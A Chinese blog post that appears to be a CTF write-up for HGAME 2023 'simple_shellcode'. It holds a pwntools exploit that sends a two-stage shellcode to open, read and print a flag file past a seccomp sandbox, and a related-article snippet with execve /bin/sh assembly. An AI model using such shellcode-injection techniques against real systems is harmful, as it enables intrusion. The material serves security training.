【PWN · ORW | shellcode】[HGAME 2023 week1]simple_shellcode

最新推荐文章于 2024-03-09 11:49:56 发布
最新推荐文章于 2024-03-09 11:49:56 发布
阅读量606 收藏 8
点赞数 6
文章标签: pwn ctf shellcode orw
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/135377076
版权

题目

 

简单分析 

执行一段shellcode但是有沙箱,禁用了execve,所以可以通过orw来得到flag。
由于对于输入的shellcode有所限制,因此可以构造二次输入。

EXP 

from pwn import *
context(arch='amd64',log_level='debug')


# io=process('./pwn')
io=remote('node5.anna.nssctf.cn',28819)
elf=ELF('./pwn')
io.recvuntil(b'Please input your shellcode:\n')

# gdb.attach(io)
# RSI  0xcafe0000
# RAX  0x0
# RDX  0xcafe0000

# mov rsi, 0xcafe0030
payload1=asm('''
            push 0; pop rdi;
            mov rsi, rdx; add rsi, 0x30;
            syscall;
            call rsi;
            ''')
success(len(payload1))
success(len(asm('push 0; pop rdi; mov rsi, rdx; add rsi, 0x30; syscall; call rsi')))
success(len(asm('mov rsi, rdx; add rsi, 0x30;')))
success(len(asm('mov rsi, 0xcafe0030')))
input()
# payload1=asm('push 0; pop rdi; mov rsi, rdx; add rsi, 0x30; syscall; call rsi')

payload2=asm(shellcraft.open('./flag')+shellcraft.read(3,0xcafe0500,0x100)+shellcraft.write(1,0xcafe0500,0x100))
io.send(payload1)
sleep(1)
io.send(payload2)
print(io.recv())
print(io.recv())
io.interactive()

总结

 注意,对于第一次输入的限制,这里刻意的打印了两种shellcode的长度

Mr_Fmnwon
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4181
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
pwn】[HGAME 2023 week1]simple_shellcode --orw利用攻击
question55的博客
11-11 159
先查看程序的保护状态可以看到,保护全开,拖进ida看主函数的逻辑可以看到有个mmap函数:mmap() 函数是Unix和类Unix操作系统中的一个系统调用,用于在进程的地址空间中映射文件或者其它对象。这样做的好处是可以让文件直接映射到内存中,从而避免了频繁的文件 I/O 操作,提高了文件的读取效率。mmap() 函数的一般形式如下:c复制代码void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);参数说
hgame2023 week1 writeup
01-15 4019
hgame2023 WEEK1
pwnorw
weixin_43960998的博客
06-19 1734
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
[HGAME 2023 week1] PWN 复现
Xzzzz911的博客
09-04 987
先ida一下,可以看出来需要进行栈迁移,并且还存在沙盒,还有一段0x30的空间(溢出的空间较大),这就是为什么exp和[NSSCTF Round#14 Basic] rbp 不一样的原因,可溢出的空间不同,导致所利用的条件不同。首先ida一下,可以很明显的了解到跟沙盒有关,再查一下沙盒机制,显然不能直接构造orw,再加上read所存储的字节数少,不能直接构造,所以可以在mmap上面来构造orw。先泄露libc,再把orw写在自己确定的bss段,再用 leave ret 转到bss段,执行orw
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
simple_calc
02-18
2016年的boston-key-party ctfpwn题,该题目考察方式比较新颖,是入门练习的一道好题,题解链接:https://blog.csdn.net/A951860555/article/details/113841290
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
pwnable_orw-seccomp沙箱
个人笔记
04-11 697
但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能,题目orw的提示就是这样来的!输出flag文件内容,sys_write(1,file,0x30);手动生成读取文件shellcode
pwn中沙盒保护之orw绕过
最新发布
wangxunyu6的博客
03-09 849
简单来说开启沙盒保护后execve被禁用,也就是说即使我们拿到shell也没有用。我们可以使用seccomp-tools dump指令进行查看。
pwnable_orw
m0_58426698的博客
03-21 333
pwn的最经典的orw的题目,顺便学了一下手写汇编,对传参有了更深的理解
pwnorw&rop --泄露libc基址,orw
question55的博客
12-04 172
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
2022强网拟态pwn wp
weixin_51480590的博客
11-18 493
这次比赛本人并没有参加,然后听说这次比赛比较简单,所以最近抽时间复现一波。由于本人web不太好,也并未涉及过webpwn,遂只复现mimic以及vm和两道堆题。
PWN刷题】Pwnable-Start、Pwnable-orw
QYbudong的博客
05-03 1398
③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。入门级题目,保护全关。
pwnpwnable_start --只有read和write函数的getshell
question55的博客
02-04 875
addrlenfd'<'LINUX -
CTF】【PWNorw
m0_50819561的博客
10-09 1296
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1218
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
pwn shellcode
05-19
Pwn shellcode是一种用于漏洞利用的机器码,常用于执行特定操作的代码。下面是一个简单的pwn shellcode示例: ```assembly section .text global _start _start: xor eax, eax ; 设置eax寄存器为0,清空寄存器 xor ebx, ebx ; 设置ebx寄存器为0 push eax ; 将0压入栈中 push 0x68732f2f ; 将字符串 "//sh" 压入栈中 push 0x6e69622f ; 将字符串 "/bin" 压入栈中 mov ebx, esp ; 将ebx寄存器设置为栈顶指针,即字符串 "/bin//sh" push eax ; 将0压入栈中 mov eax, 11 ; 将eax寄存器设置为11,即execve系统调用的编号 int 0x80 ; 执行系统调用 ``` 这段代码将字符串 "/bin//sh" 作为参数调用 execve 系统调用,打开一个 shell。可以将这段代码编译成二进制形式,并将其插入到目标程序的漏洞点上,从而实现对目标程序的控制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值